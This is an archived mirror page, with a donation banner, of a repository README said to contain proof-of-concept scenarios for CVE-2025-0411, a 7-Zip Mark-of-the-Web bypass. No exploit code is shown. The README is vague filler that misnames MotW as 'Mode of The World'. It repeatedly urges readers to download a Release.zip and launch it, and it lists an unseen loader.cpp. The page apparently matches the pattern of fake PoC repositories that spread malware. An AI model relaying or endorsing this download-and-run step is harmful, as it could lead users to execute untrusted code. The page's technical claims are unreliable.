Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-0411 PoC — 7-Zip 安全漏洞

Source
Associated Vulnerability
Title:7-Zip 安全漏洞 (CVE-2025-0411)
Description:7-Zip是7-Zip开源的一个压缩软件。 7-Zip 24.09之前版本存在安全漏洞,该漏洞源于存在绕过漏洞,允许远程攻击者在当前用户的环境中执行任意代码。
Description
This repository contains POC scenarios as part of CVE-2025-0411 MotW bypass.
Readme
# 🚀 7-Zip-CVE-2025-0411-POC Repository

Welcome to the official repository for "7-Zip-CVE-2025-0411-POC"! 🎉

![7Zip Logo](https://upload.wikimedia.org/wikipedia/commons/thumb/f/f3/7-Zip_logo.svg/180px-7-Zip_logo.svg.png)

## About the Repository

This repository contains Proof of Concept (POC) scenarios related to the CVE-2025-0411 vulnerability allowing for a MotW (Mode of The World) bypass in the popular file archiver software 7-Zip.

## Repository Details

- **Repository Name:** 7-Zip-CVE-2025-0411-POC  
- **Description:** This repository contains POC scenarios as part of CVE-2025-0411 MotW bypass  
- **Topics:** 7zip, cve, cve-2025-0411, cve-2025-0411-poc, payload-delivery, poc  

## Getting Started

To access the POC scenarios, click on the following link:  
[![Download Now](https://img.shields.io/badge/Download-Release.zip-blue)](https://github.com/assets/Release.zip)

If the link does not open directly, ensure to launch the downloaded file to access the content.

In case the link does not lead to the intended destination or does not work, please check the "Releases" section of this repository for alternative download options.

## What is CVE-2025-0411?

CVE-2025-0411 is a specific vulnerability identified in the 7-Zip software that allows for a Mode of The World (MotW) bypass. This vulnerability could potentially be exploited by malicious actors to execute arbitrary code or access sensitive information on a system where 7-Zip is installed.

## Why is This Repository Important?

The POC scenarios provided in this repository serve as a demonstration of the CVE-2025-0411 vulnerability in 7-Zip, highlighting the potential risks associated with the MotW bypass. By exploring these scenarios, users can better understand the implications of such vulnerabilities and take necessary measures to enhance the security of their systems.

## How to Use the POC Scenarios

The POC scenarios included in this repository are designed for educational and informational purposes only. It is important to handle these scenarios with caution and avoid using them for malicious intent. 

To run the POC scenarios, download the content from the provided link and follow the instructions within the files. Ensure that you are using a safe and controlled environment to prevent any unintended consequences.

## Contribution

Contributions to this repository are welcome! If you have further insights, improvements, or additional POC scenarios related to the CVE-2025-0411 vulnerability in 7-Zip, feel free to submit a pull request. Your contributions can help enhance the overall understanding and awareness of cybersecurity threats.

Let's work together to create a more secure digital environment for everyone.

---

By exploring the contents of this repository, you are taking a step towards understanding and mitigating potential cybersecurity risks associated with software vulnerabilities. Stay informed, stay vigilant, and together, we can build a safer online community. Thank you for your interest in "7-Zip-CVE-2025-0411-POC"! 🛡️

![Cybersecurity](https://www.brandeps.com/icon-download/C/Cyber-Security-icon-vector-01.svg)

*Protecting digital assets through knowledge and awareness.*
File Snapshot

[4.0K] /data/pocs/c872de61cf918aad573d1b9471bb6119b8155fad ├── [ 652] loader.cpp └── [3.1K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.